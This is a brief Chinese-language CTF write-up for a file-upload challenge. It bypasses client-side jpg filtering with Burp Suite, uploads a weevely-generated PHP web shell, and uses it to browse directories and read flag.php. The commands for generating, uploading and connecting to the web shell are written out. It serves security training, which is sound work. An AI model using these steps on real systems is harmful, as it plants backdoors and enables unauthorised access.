首先,标题是upload,
提示就是上传漏洞
无非就是js拦截,代码拦截,看了以下
网页head头,发现js代码,关键字jpg

  • burpsuite 抓包,配置代理

  • weevely 生成一句话

    1
    2
    weevely generate password ./1.php  #use weevely在当前目录生成1.php,密码passwd
    mv 1.php 1.php.jpg

  • 选择文件上传 && burpsuite 抓包 删掉.jpg

  • 回显 upload success : upload/1592555994.1.php

  • weevely 连接

    1
    2
    3
    4
    5
    weevely http://220.249.52.133:57535/upload/1592554838.1.php password # weevely 连接
    dir # 显示目录
    cd ../..
    发现flag.php
    cat flag.php

得到flag

推荐一个上传漏洞的靶场:https://github.com/c0ny1/upload-labs